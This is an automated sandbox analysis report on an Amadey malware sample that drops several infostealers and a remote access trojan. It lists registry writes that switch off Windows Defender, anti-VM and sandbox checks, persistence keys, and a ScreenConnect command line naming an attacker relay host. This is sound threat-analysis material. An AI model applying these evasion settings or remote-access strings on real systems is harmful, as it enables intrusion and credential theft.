amadey | 0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	Temp2B1J70DQKY4P1C40OFHU9DSN9LFXU24H.EXE

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Temp2B1J70DQKY4P1C40OFHU9DSN9LFXU24H.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	Temp2B1J70DQKY4P1C40OFHU9DSN9LFXU24H.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	Temp2B1J70DQKY4P1C40OFHU9DSN9LFXU24H.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Temp2B1J70DQKY4P1C40OFHU9DSN9LFXU24H.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Temp2B1J70DQKY4P1C40OFHU9DSN9LFXU24H.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Temp2B1J70DQKY4P1C40OFHU9DSN9LFXU24H.EXE

Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	Temp2B1J70DQKY4P1C40OFHU9DSN9LFXU24H.EXE

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

defense_evasion trojan

Windows Service

Modify Registry

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	Temp2B1J70DQKY4P1C40OFHU9DSN9LFXU24H.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	Temp2B1J70DQKY4P1C40OFHU9DSN9LFXU24H.EXE

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 2 IoCs

resource	yara_rule
behavioral1/memory/2504-272-0x0000000001070000-0x00000000014E8000-memory.dmp	family_sectoprat
behavioral1/memory/2504-273-0x0000000001070000-0x00000000014E8000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Enumerates VirtualBox registry keys 2 TTPs 1 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF	372485f12e.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 19 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5782e13f6e.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3d2e5da9a6.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	MAl7pjE.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	db484a9c5c.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	372485f12e.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	52206648a6.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	f29907a492.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ae7650820a.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Temp2B1J70DQKY4P1C40OFHU9DSN9LFXU24H.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	MAl7pjE.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	716ddbb44f.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	d9b3cb7467.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	aca90f55db.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2b8d02974d.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1b80ca21fe.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Temp0D7A7JN79A8OBJY0RPYF8PC47TCOJGG7.EXE

Blocklisted process makes network request 3 IoCs

flow	pid	Process
13	2492	powershell.exe
17	2376	powershell.exe
184	3980	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2044	powershell.exe
2484	powershell.exe
2912	powershell.exe
2492	powershell.exe
2376	powershell.exe
3980	powershell.exe

Downloads MZ/PE file 27 IoCs

flow	pid	Process
5	2808	skotes.exe
5	2808	skotes.exe
5	2808	skotes.exe
5	2808	skotes.exe
5	2808	skotes.exe
5	2808	skotes.exe
5	2808	skotes.exe
5	2808	skotes.exe
5	2808	skotes.exe
5	2808	skotes.exe
5	2808	skotes.exe
5	2808	skotes.exe
5	2808	skotes.exe
5	2808	skotes.exe
5	2808	skotes.exe
5	2808	skotes.exe
5	2808	skotes.exe
10	2808	skotes.exe
162	556	BitLockerToGo.exe
164	2808	skotes.exe
164	2808	skotes.exe
164	2808	skotes.exe
13	2492	powershell.exe
74	876	futors.exe
17	2376	powershell.exe
52	876	futors.exe
184	3980	powershell.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

credential_access stealer

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\ScreenConnect Client (91b7d375130f294a)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (91b7d375130f294a)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=fv-dev.innocreed.com&p=8041&s=4c1c2002-a97f-4c37-803c-c5cb50aec162&k=BgIAAACkAABSU0ExAAgAAAEAAQD5wtPOV3jCKFBLBsJ%2bV2IvGNdB3BTw3%2f7f3qmPmpEeYSXd1jGOatzoch6LU%2fh7cgGu%2bCj4f65wOx8AqDxICfj1AlxsHvMXD0ReOH62PLLSTPTukKm5RrhhJDxk4MmWP%2byBb46HAlkpjuwiGPts8qrBKMb47tVBoGNwLhbutjkbQNksjhMQH1AWAWUktJQ85d0L163Ahixe3xI7cGngG1%2baQm5IzZ3UPJpZ%2b9SN8gb89xLov6PdHVlnj%2bxe1Qvlapboi4ODTYPekRoAhHcR2A9cyIErFTA4j5R4TWoF8f3ZRb6IRobccYev2f%2b8vM98GtEnWHEzuZHxGcRJ5afFuG3P&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAszLJ%2b6z9q0SwNEslP9buvwAAAAACAAAAAAAQZgAAAAEAACAAAABXak8%2f0F2axFweXrG6bzrTaMAM6q25o1UhmIRcoqo8JgAAAAAOgAAAAAIAACAAAADiEdUKgAzq3RDJom6SvHO%2bjWDXhMVOOiMKcgbLtstWp6AEAABu5PVqYvqFW%2ftzuCs8NE8sFNspfOofjdo5Fv0Gt2l0P8X3zzty6ldedUFF96SFZKgIWsKtY5tZ%2f0U5jRaIR5nkakpHcUaOmDWa1M8W2uuOpNSjAm5xkxB0unQQvgUpXkjeO4aSVOET01vyMJCW0dm%2bUnKY%2bAK8yyEDy1jBRF5Epc9Gz9lXKRC3xQg58YrFw9R6k5fhJRbx047h9YP%2fx6pQpFDmxPRIX28T0jkTuK0eX8Lbiz1KwBbzj%2f9vz9UfQMJIv9Y6doLo0XNeUbIRxxIkjWE826srCvF2G%2foqsgQpxtpL%2f6G8arK5%2bniaarqQ%2bcw11Gg9NJHDdBjO538Qg9cOyoPG4XJNIUE5Kt12Xf4z8HOmAhD7Vuy93l6UgSB%2bBeHGLqZOHbq9Uy6qqmtVs1Hk5iqyq4AzDnjv7lwzgWYw8Jjz9JoTET739XFAeMRF%2f1hBhJiLNFdaflRjvM%2f0EA%2fMC7r%2bsqI60GWGGL9v3uuDt8g2fCchrIrXXTTHPNEDylWKdXkoj1cH5tD9g5jZjulaLCXGLpwhC8BuhwkHr0kkB5Np1eSWH4F5fe2poqyIyBydKA4GPuDzsRX9OTGgCmrc6aZbznO15%2f3ZR3AZDANdu5UJk6bz2Hp67QR1LJzHMlG%2bqB68Axqns1sjR2iPm%2bd%2fVEf9nRUP7uaYtgWRnC8glVPYvg9qTjR4LvPTvPTnAu0lUo%2b2V6%2bzDdzFWAKSsTQ3ZC6zsmX460prg83WSGCqGB1a4mpnId285aXtjulgkM60jjGGIRYXiPvgB72Zc8vaplzJ6S9RIL%2fWjJ9vu7qitKK5cUc9DwllZqiFYMDiwNXLuM5ChM7b5WF%2bQxGI9usZEeIiqtEmrTjVzWB%2b61oc%2fKSV16lZkK85Wa9JCbUsXJcHJ3sv2X7KqRZr9V0rI7StHdfIHdzCirWYis4EcOCcxzvDDihmD8J4xfosZSpVojDT6It%2bf9Zlw80qFH5wdlm67Yl3B%2b0SrgeB%2bxnC%2bTtxrhKyncgH5%2bHdf1GvmUlNQiqG1wT2admT4kF95TXWD%2fynJwLv8jY2veXbv1S1ebHAi6u9cbijgsfVWTiEMZMm9TEL2zMPFpTqJ1IZcsko7arjPoHzIBVm4aa0fDBKNTiAD1YI4IUkgWeY01XzXz4Vq1i8R6nJBBiWqLxWbfU7dz5rX3%2bmjdqcLrKb9E7KQearFLT0ysZn7J8ZeguYsJMf8oXxYlzIQKMb5SRRgWAjhEGiecZMi111VFZn2QbJNSDbl6mHZk51aKjYtbbSZKY3WQI25PJP94bK%2b%2bUpPukt8h92f8yN%2fnsCbEJtMlet8j6etkJxsVrMefhP%2bX6YPydtKQ%2f5nJv7nSjbN0%2f5LPg9GQw69P2k59s2JOf0cqXC8otm8QRnthOwkdcH%2fZ7BWxLDXu6FSqyhH1erqnpc1%2f5T3krnrDHK9nKfSUKEYOF6xlLvPG5GIW36cgSweY4GpU0DqPIfCIjMi5XwMBMtthko8YIyJRDwrQc%2biyYVtWMvmeViJL9At1FwXy6ltjIYRCuBU%2b4hPDisRo27HBs63HQSkU2QU0DyV00IEWryQvJwAGWEVkAAAABMlk6I1t1nG3u9vdTyI5VagYJiK02kaFv5s7bxhZ4co0pJ%2baFGGigXKVmUCev%2fzAk5ingCMVlbEgU0XZ2Affs0&c=prequest&c=&c=&c=&c=&c=&c=&c=\""	ScreenConnect.ClientService.exe

Uses browser remote debugging 2 TTPs 7 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
3272	chrome.exe
1504	chrome.exe
1740	chrome.exe
3144	chrome.exe
3152	chrome.exe
3756	chrome.exe
3292	chrome.exe

Checks BIOS information in registry 2 TTPs 38 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	db484a9c5c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	aca90f55db.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	372485f12e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2b8d02974d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	716ddbb44f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	MAl7pjE.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	db484a9c5c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	aca90f55db.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	372485f12e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	d9b3cb7467.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	MAl7pjE.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5782e13f6e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5782e13f6e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3d2e5da9a6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1b80ca21fe.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Temp0D7A7JN79A8OBJY0RPYF8PC47TCOJGG7.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Temp2B1J70DQKY4P1C40OFHU9DSN9LFXU24H.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Temp2B1J70DQKY4P1C40OFHU9DSN9LFXU24H.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	MAl7pjE.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	52206648a6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	MAl7pjE.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3d2e5da9a6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1b80ca21fe.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	d9b3cb7467.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	52206648a6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2b8d02974d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	716ddbb44f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Temp0D7A7JN79A8OBJY0RPYF8PC47TCOJGG7.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ae7650820a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ae7650820a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	f29907a492.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	f29907a492.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 49 IoCs

pid	Process
2808	skotes.exe
680	sQ3DZPU.exe
1032	a1EoH8b.exe
2280	MAl7pjE.exe
1796	7be12f2342.exe
1620	Temp2B1J70DQKY4P1C40OFHU9DSN9LFXU24H.EXE
1228	ScreenConnect.ClientService.exe
2504	52206648a6.exe
2432	ScreenConnect.WindowsClient.exe
1724	ScreenConnect.WindowsClient.exe
272	f29907a492.exe
1744	483d2fa8a0d53818306efeb32d3.exe
2492	amnew.exe
876	futors.exe
2392	apisysDirectx.exe
2292	db484a9c5c.exe
2984	DTQCxXZ.exe
1776	7aencsM.exe
3004	7aencsM.exe
1296	apisysDirectx.exe
2176	monthdragon.exe
2468	monthdragon.exe
2312	monthdragon.exe
988	monthdragon.exe
596	dzvh4HC.exe
1696	Bjkm5hE.exe
2548	Bjkm5hE.exe
1296	f3Ypd8O.exe
1628	f3Ypd8O.exe
816	MAl7pjE.exe
1464	aca90f55db.exe
2176	NL58452.exe
1572	NL58452.exe
2744	sQ3DZPU.exe
2604	372485f12e.exe
2004	5782e13f6e.exe
1784	2b8d02974d.exe
2032	3d2e5da9a6.exe
3116	fd81d29568.exe
3708	3e0505c684.exe
2672	1b80ca21fe.exe
2500	716ddbb44f.exe
3776	apisysDirectx.exe
4068	c139e4b71c.exe
3120	cd7bf9405c.exe
784	Temp0D7A7JN79A8OBJY0RPYF8PC47TCOJGG7.EXE
3912	d9b3cb7467.exe
3400	service123.exe
3436	ae7650820a.exe

Identifies Wine through registry keys 2 TTPs 19 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	52206648a6.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	aca90f55db.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	1b80ca21fe.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	f29907a492.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	MAl7pjE.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	5782e13f6e.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	ae7650820a.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	MAl7pjE.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	Temp2B1J70DQKY4P1C40OFHU9DSN9LFXU24H.EXE
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	db484a9c5c.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	372485f12e.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	2b8d02974d.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	3d2e5da9a6.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	716ddbb44f.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	Temp0D7A7JN79A8OBJY0RPYF8PC47TCOJGG7.EXE
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	d9b3cb7467.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	skotes.exe

Loads dropped DLL 64 IoCs

pid	Process
2108	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
2108	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
2808	skotes.exe
2808	skotes.exe
1936	MsiExec.exe
596	rundll32.exe
596	rundll32.exe
596	rundll32.exe
596	rundll32.exe
596	rundll32.exe
596	rundll32.exe
596	rundll32.exe
596	rundll32.exe
596	rundll32.exe
2808	skotes.exe
2808	skotes.exe
2808	skotes.exe
2492	powershell.exe
2492	powershell.exe
1084	MsiExec.exe
2252	MsiExec.exe
1228	ScreenConnect.ClientService.exe
1228	ScreenConnect.ClientService.exe
1228	ScreenConnect.ClientService.exe
1228	ScreenConnect.ClientService.exe
1228	ScreenConnect.ClientService.exe
1228	ScreenConnect.ClientService.exe
1228	ScreenConnect.ClientService.exe
1228	ScreenConnect.ClientService.exe
2808	skotes.exe
1228	ScreenConnect.ClientService.exe
1228	ScreenConnect.ClientService.exe
1228	ScreenConnect.ClientService.exe
1228	ScreenConnect.ClientService.exe
1228	ScreenConnect.ClientService.exe
2808	skotes.exe
2376	powershell.exe
2376	powershell.exe
2808	skotes.exe
2492	amnew.exe
680	sQ3DZPU.exe
1488	WerFault.exe
1488	WerFault.exe
1488	WerFault.exe
2808	skotes.exe
2808	skotes.exe
2808	skotes.exe
2808	skotes.exe
2808	skotes.exe
1776	7aencsM.exe
344	WerFault.exe
344	WerFault.exe
344	WerFault.exe
344	WerFault.exe
344	WerFault.exe
876	futors.exe
876	futors.exe
2176	monthdragon.exe
2176	monthdragon.exe
2176	monthdragon.exe
272	WerFault.exe
272	WerFault.exe
272	WerFault.exe
2808	skotes.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Windows security modification 2 TTPs 2 IoCs

defense_evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features	Temp2B1J70DQKY4P1C40OFHU9DSN9LFXU24H.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	Temp2B1J70DQKY4P1C40OFHU9DSN9LFXU24H.EXE

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\716ddbb44f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1089294001\\716ddbb44f.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\c139e4b71c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1089295001\\c139e4b71c.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\cd7bf9405c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1089296001\\cd7bf9405c.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\7be12f2342.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1089179101\\7be12f2342.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1089180021\\am_no.cmd"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\372485f12e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10009640101\\372485f12e.exe"	futors.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\3d2e5da9a6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10009650101\\3d2e5da9a6.exe"	futors.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\1b80ca21fe.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1089293001\\1b80ca21fe.exe"	skotes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

persistence privilege_escalation

description	ioc	Process
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0006000000019438-141.dat	autoit_exe
behavioral1/files/0x000500000001ca39-1444.dat	autoit_exe
behavioral1/files/0x000400000001cb39-1457.dat	autoit_exe

Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

Suspicious Windows Authentication Registry Modification.

Authentication Package

T1547.002

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800390031006200370064003300370035003100330030006600320039003400610029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000	msiexec.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
